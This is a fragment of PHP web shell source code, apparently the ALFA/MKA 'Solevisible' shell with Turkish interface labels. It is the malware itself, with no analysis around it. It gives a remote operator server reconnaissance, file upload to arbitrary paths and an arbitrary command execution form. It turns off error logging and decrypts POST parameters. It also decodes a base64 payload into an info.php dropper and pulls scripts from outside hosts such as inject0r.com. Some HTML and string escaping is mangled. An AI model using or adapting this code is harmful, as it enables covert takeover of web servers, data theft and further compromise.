- echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">' . (function_exists('php_uname') ? php_uname() : '???') . '</font></b></big>';
- $safe_mode = @ini_get('safe_mode');
- if ($safe_mode) {
- $r = "<b style='color: red'>On</b>";
- } else {
- $r = "<b style='color: green'>Off</b>";
- }
- echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . '</font><br>';
- echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER['SERVER_SOFTWARE'] . '</font><br>';
- echo 'PHP Version: <font color=white>' . PHP_VERSION . '</font><br />';
- echo 'PWD:<font color=#FFFFFF> ' . str_replace("\",'/',@getcwd()) .'/<br />';
- echo " < bstyle = 'color: #7CFC00' > SafeMode:
- $r < br > ";
- echo '<font color=#7CFC00>Disable functions : </font>';
- $disfun = @ini_get('disable_functions');
- if (empty($disfun))
- {
- $disfun = '<font color="green">NONE</font>';
- }
- echo '<font color=red>';
- echo "$disfun";
- echo '</font><br>';
- echo " < bstyle = 'color: #7CFC00' > YourIpAddressis: < / font > < fontcolor = white > ".$_SERVER['REMOTE_ADDR'] .'</font><br>';
- echo " < bstyle = 'color: #7CFC00' > ServerIpAddressis: < / font > < fontcolor = white > ".(function_exists('gethostbyname') ?@gethostbyname($_SERVER['HTTP_HOST']) : '???') .'</font><br><p>';
- echo '<hr><center><form onSubmit="this . upload . disabled = true;
- this . cwd . value = btoa(unescape(encodeURIComponent(this . cwd . value)));
- " action="" method="post" enctype="multipart / form - data" name="uploader" id="uploader">';
- echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\",' / ',@getcwd()) .' / " size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
- if (isset($_FILES['file']))
- {
- if (@move_uploaded_file($_FILES['file']['tmp_name'],__ZGVjb2Rlcg(@$_POST['cwd']) .'/'.$_FILES['file']['name']))
- {
- echo '<b><font color=" #7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>';
- } else {
- echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>';
- }
- }
- echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form><hr><pre>';
- if (isset($_POST['command_solevisible'])) {
- if (strtolower(substr(PHP_OS, 0, 3)) == 'win') $separator = '&';
- else $separator = ';';
- $solevisible = "cd '" . addslashes(str_replace("\",'/',@getcwd())) ."'".$separator .''.__ZGVjb2Rlcg($_POST['command_solevisible']);
- echo alfaEx($solevisible);
- }
- echo ' < / pre > < / body > < / html > ';
- exit;
- }
- @error_reporting(E_ALL ^E_NOTICE);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('magic_quotes_runtime',0);
- @set_time_limit(0);
- if (function_exists('set_magic_quotes_runtime'))
- {
- @set_magic_quotes_runtime(0);
- }
- foreach ($_POST as $key =>$value)
- {
- if (is_array($_POST[$key]))
- {
- $i = 0;
- foreach ($_POST[$key] as $f)
- {
- $f = trim(str_replace('',' + ',$f));
- $_POST[$key][$i] = decrypt_post($f,_AlfaSecretKey());
- $i++;
- }
- }
- else
- {
- $value = trim(str_replace('',' + ',$value));
- $_POST[$key] = decrypt_post($value,_AlfaSecretKey());
- }
- }
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'Windows - 1251';
- if (strtolower(substr(PHP_OS,0,3)) == 'win') $GLOBALS['sys'] = 'win';
- else $GLOBALS['sys'] = 'unix';
- $GLOBALS['home_cwd'] = @getcwd();
- if ($_POST['a'] != 'GetPathHistory')
- {
- if ($_SESSION[__LAST_CWD__] != $_POST['c'])
- {
- $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
- }
- }
- $GLOBALS['need_to_update_header'] = 'false';
- if (isset($_POST['c']))
- {
- if (!@chdir($_POST['c']))
- {
- $GLOBALS['glob_chdir_false'] = true;
- }
- }
- $GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__]) &&$_SESSION[__LAST_CWD__] != ''&&!isset($_POST['c']) ?$_SESSION[__LAST_CWD__] : @getcwd());
- if (!@is_dir)
- {
- $GLOBALS['cwd'] = @getcwd();
- }
- if ($GLOBALS['sys'] == 'win')
- {
- $GLOBALS['home_cwd'] = str_replace("\",' / ',$GLOBALS['home_cwd']);
- $GLOBALS['cwd'] = str_replace("\",' / ',$GLOBALS['cwd']);
- $_SESSION[__PATH_HISTORY__] = str_replace("\",' / ',$_SESSION[__PATH_HISTORY__]);
- }
- if ($GLOBALS['cwd'][strlen($GLOBALS['cwd']) -1] != ' / ') $GLOBALS['cwd'] .= ' / ';
- function alfaGetPathHistory()
- {
- echo (isset($_SESSION[__PATH_HISTORY__]) &&!empty($_SESSION[__PATH_HISTORY__]) ?$_SESSION[__PATH_HISTORY__] : $GLOBALS['home_cwd']);
- }
- function alfahead()
- {
- if (!function_exists('sys_get_temp_dir'))
- {
- function sys_get_temp_dir()
- {
- foreach (array(
- 'TMP',
- 'TEMP',
- 'TMPDIR'
- ) as $env_var)
- {
- if ($temp = getenv($env_var))
- {
- return $temp;
- }
- }
- $temp = tempnam($GLOBALS['__file_path'],'');
- if (_alfa_file_exists($temp,false))
- {
- unlink($temp);
- return dirname($temp);
- }
- return null;
- }
- }
- $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHNjcmlwdCBkYXRhLWNmYXN5bmM9J2ZhbHNlJyBzcmM9Jy8vd2FyZXptLmNvbS9zaGVsbC5qcyc + PC9zY3JpcHQ + PHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI + PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc + PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI + PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ + PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc + PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ + PC9jZW50ZXI + PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI + PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ + PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I + PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ + PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I + PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc + c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8 + ';
- $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'] .'");
- $solevisible = fopen("info.php", "w");
- fwrite($solevisible, $x);
- ';
- define('ALFA_UPLOADER',"eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader) ."'))");
- define('ALFA_TEMPDIR',(function_exists('sys_get_temp_dir') ?(@is_writable(str_replace('\',' / ',sys_get_temp_dir())) ?sys_get_temp_dir() : (@is_writable(' . ') ?' . ': false)) : false));
- if (!isset($_POST['ajax']))
- {
- function Alfa_GetDisable_Function()
- {
- $disfun = @ini_get('disable_functions');
- $afa = ' < spanclass = "header_show_all" > Tmfonksiyonlarkullanlabilir < / span > ';
- if (empty($disfun)) return ($afa);
- $s = explode(', ',$disfun);
- $s = array_unique($s);
- $i = 0;
- $b = 0;
- $func = array(
- 'system',
- 'exec',
- 'shell_exec',
- 'proc_open',
- 'popen',
- 'passthru',
- 'symlink',
- 'dl'
- );
- $black_list = array();
- $allow_list = array();
- foreach ($s as $d)
- {
- $d = trim($d);
- if (empty($d) ||!is_callable($d)) continue;
- if (!function_exists($d))
- {
- if (in_array($d,$func))
- {
- $dis .= $d .' | ';
- $b++;
- $black_list[] = $d;
- }
- else
- {
- $allow_list[] = $d;
- }
- $i++;
- }
- }
- if ($i == 0) return ($afa);
- if ($i <= count($func))
- {
- $all = array_values(array_merge($black_list,$allow_list));
- return (' < spanclass = "disable_functions" > '.implode(' | ',$all) .' < / span > ');
- }
- return (' < spanclass = "disable_functions" > '.$dis .' < / span > < ahref = javascript:
- void(0) onclick = "g(\'GetDisFunc\',null,\'wp\');" > < spanclass = "header_show_all" > Hepsinigster('.$i .') < / span > < / a > ');
- }
- if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
- $freeSpace = function_exists('diskfreespace') ?@diskfreespace($GLOBALS['cwd']) : ' ? ';
- $totalSpace = function_exists('disk_total_space') ?@disk_total_space($GLOBALS['cwd']) : ' ? ';
- $totalSpace = $totalSpace ?$totalSpace : 1;
- $on = "<span class='header_on'> AIK </span>";
- $of = "<span class='header_off'> KAPALI </span>";
- $none = "<span class='header_none'> YOK </span>";
- if (function_exists('ssh2_connect')) $ssh2 = $on;
- else $ssh2 = $of;
- if (function_exists('curl_version')) $curl = $on;
- else $curl = $of;
- if (function_exists('mysql_get_client_info')) $mysql = $on;
- else $mysql = $of;
- if (function_exists('mssql_connect')) $mssql = $on;
- else $mssql = $of;
- if (function_exists('pg_connect')) $pg = $on;
- else $pg = $of;
- if (function_exists('oci_connect')) $or = $on;
- else $or = $of;
- if (@ini_get('disable_functions')) $disfun = @ini_get('disable_functions');
- else $disfun = 'Tmfonksyionlarkullanlabilir';
- if (@ini_get('safe_mode')) $safe_modes = "<span class='header_off'>AIK</span>";
- else $safe_modes = "<span class='header_on'>KAPALI</span>";
- $cgi_shell = "<span class='header_off' id='header_cgishell'>KAPALI</span>";
- if (@ini_get('open_basedir'))
- {
- $basedir_data = @ini_get('open_basedir');
- if (strlen($basedir_data) >120)
- {
- $open_b = substr($basedir_data,0,120) .' . . . ';
- }
- else
- {
- $open_b = $basedir_data;
- }
- }
- else
- {
- $open_b = $none;
- }
- if (@ini_get('safe_mode_exec_dir')) $safe_exe = @ini_get('safe_mode_exec_dir');
- else $safe_exe = $none;
- if (@ini_get('safe_mode_include_dir')) $safe_include = @ini_get('safe_mode_include_dir');
- else $safe_include = $none;
- if (!function_exists('posix_getegid'))
- {
- $user = function_exists('get_current_user') ?@get_current_user() : ' ? ? ? ? ';
- $uid = function_exists('getmyuid') ?@getmyuid() : ' ? ? ? ? ';
- $gid = function_exists('getmygid') ?@getmygid() : ' ? ? ? ? ';
- $group = ' ? ';
- }
- else
- {
- $uid = function_exists('posix_getpwuid') &&function_exists('posix_geteuid') ?@posix_getpwuid(posix_geteuid()) : array(
- 'name'=>' ? ? ? ? ',
- 'uid'=>' ? ? ? ? '
- );
- $gid = function_exists('posix_getgrgid') &&function_exists('posix_getegid') ?@posix_getgrgid(posix_getegid()) : array(
- 'name'=>' ? ? ? ? ',
- 'gid'=>' ? ? ? ? '
- );
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- }
- $cwd_links = '';
- $path = explode(' / ',$GLOBALS['cwd']);
- $n = count($path);
- for ($i = 0;$i <$n -1;$i++)
- {
- $cwd_links .= "<a class='header_pwd' href='javascript : void(0);
- ' onclick='g(\"FilesMan\",\"";
- for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . '/';
- $cwd_links.= "\")'>" . $path[$i] . '/</a>';
- }
- $drives = '';
- foreach (range('a', 'z') as $drive) if (@is_dir($drive . ':\')) $drives .= ' < ahref = "javascript:void(0);"class = "header_drive"onclick = "g(\'FilesMan\',\''.$drive .':/\')" > ['.$drive .'] < / a > ';
- $csscode = ' - moz - animation - name : spin; - moz - animation - iteration - count : infinite; - moz - animation - timing - function : linear; - moz - animation - duration : 1s; - webkit - animation - name : spin; - webkit - animation - iteration - count : infinite; - webkit - animation - timing - function : linear; - webkit - animation - duration : 1s; - ms - animation - name : spin; - ms - animation - iteration - count : infinite; - ms - animation - timing - function : linear; - ms - animation - duration : 1s;
- animation - name : spin;
- animation - iteration - count : infinite;
- animation - timing - function : linear;
- animation - duration : 1s;
- ';
- echo ' < !DOCTYPEhtmlPUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > < htmlxmlns = "http://www.w3.org/1999/xhtml" > < head > < metahttp - equiv = "Content-Type"content = "text/html; charset=utf-8" / > < metaname = "ROBOTS"content = "NOINDEX, NOFOLLOW" / > < linkhref = "'.__showicon('alfamini') .'"rel = "icon"type = "image/x-icon" / > < title > . . ::'.$_SERVER['HTTP_HOST'] .' ~ MKASPYShell - v'.__MKA_VERSION__ .':: . . < / title > < SCRIPTSRC = http : //inject0r.com/update.js></SCRIPT><link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet"><style type="text/css">.hlabale{color:#67ABDF;border-radius:4px;border:1px solid #27979B;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}.editor-view{position:relative}.view-content{position:absolute;overflow-y:auto;width:100%;height:475px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,0.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,0.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}#editor-minimized,#cgiloader-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:167px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:#f5deb3;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:50px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:before,.close-button:after,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,0.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0deg)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,0.96)}#editor,#cgiloader{display:none;position:fixed;top:0;width:100%;height:100%}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,0.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,0.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,0.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder > .history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color 600ms ease-out}.file-holder > .history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity 600ms ease-out;font-size:15px;height:19px}.file-holder > .history:hover{background-color:#646464}.editor-explorer > .hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px}.editor-anim-close{'.showAnimation('editorClose') .'}@keyframes editorClose{0%{transform:scale(1);opacity:1}100%{transform:scale(0);opacity:0}}.editor-anim-minimize{'.showAnimation('editorMinimize') .'}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{'.showAnimation('editorShow') .'}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{'.showAnimation('minimizeShow') .'}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{'.showAnimation('minimizeHide') .'}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0F0;-moz-text-shadow:0 0 25px #0F0;-ms-text-shadow:0 0 25px #0F0;text-shadow:0 0 25px #0F0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,0.72);width:100%;height:100%}.update-partner{width:50%;position:relative;border-radius:31px;height:200px;background-color:rgba(3,3,41,0.47);text-align:center;color:rgba(252,253,251,0.88);margin-left:25%;top:23%;font-family:"Francois One",sans-serif}.update-partner:hover{-webkit-box-shadow:inset 0 0 99px 9px rgba(11,15,41,1);-moz-box-shadow:inset 0 0 99px 9px rgba(11,15,41,1);box-shadow:inset 0 0 99px 9px rgba(11,15,41,1)}.update-content{position:relative}.update-content > a{text-decoration:none;position:absolute;color:rgba(103,167,47,0.77);left:24%;margin-top:7%;font-size:40px;font-family:"Francois One",sans-serif}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67ABDF;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px;}.editor-path{top:3px;}}@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}#alfaloader{'.$csscode .'width:100px;height:100px;}#a_loader{'.$csscode .'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://i.hizliresim.com/MD1qQQ.jpg);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor('header_values') .';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini') .');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons'] == '1'?'0': '1') .'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini') .');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn') .');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd']) ?'}.dir{background-color:red;}': '}') .'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }'.alfaCssLoadColors() .'</style>';
- echo "<script type='text/javascript'>var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';var a_ = '" . htmlspecialchars(@$_POST['a']) . "';var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';var alfa1_ = '" . ((strpos(@$_POST['alfa1'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa1'], ENT_QUOTES)) . "';var alfa2_ = '" . ((strpos(@$_POST['alfa2'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa2'], ENT_QUOTES)) . "';var alfa3_ = '" . ((strpos(@$_POST['alfa3'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa3'], ENT_QUOTES)) . "';var alfa4_ = '" . ((strpos(@$_POST['alfa4'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa4'], ENT_QUOTES)) . "';var alfa5_ = '" . ((strpos(@$_POST['alfa5'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa5'], ENT_QUOTES)) . "';var alfa6_ = '" . ((strpos(@$_POST['alfa6'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa6'], ENT_QUOTES)) . "';var alfa7_ = '" . ((strpos(@$_POST['alfa7'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa7'], ENT_QUOTES)) . "';var alfa8_ = '" . ((strpos(@$_POST['alfa8'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa8'], ENT_QUOTES)) . "';var alfa9_ = '" . ((strpos(@$_POST['alfa9'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa9'], ENT_QUOTES)) . "';var alfa10_ = '" . ((strpos(@$_POST['alfa10'], "
- ") !== false) ? '' : htmlspecialchars($_POST['alfa10'], ENT_QUOTES)) . "';var d = document;var mysql_cache = {};var editor_files = {};var editor_error = true;var editor_current_file = '';var is_minimized = false;var cgi_is_minimized = false;var cgi_lang = '';var upcount = 1;var islinux = " . ($GLOBALS['sys'] != 'win' ? 'true' : 'false') . ';var post_encryption_mode = ' . (__ALFA_POST_ENCRYPTION__ ? 'true' : 'false') . ';function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;';
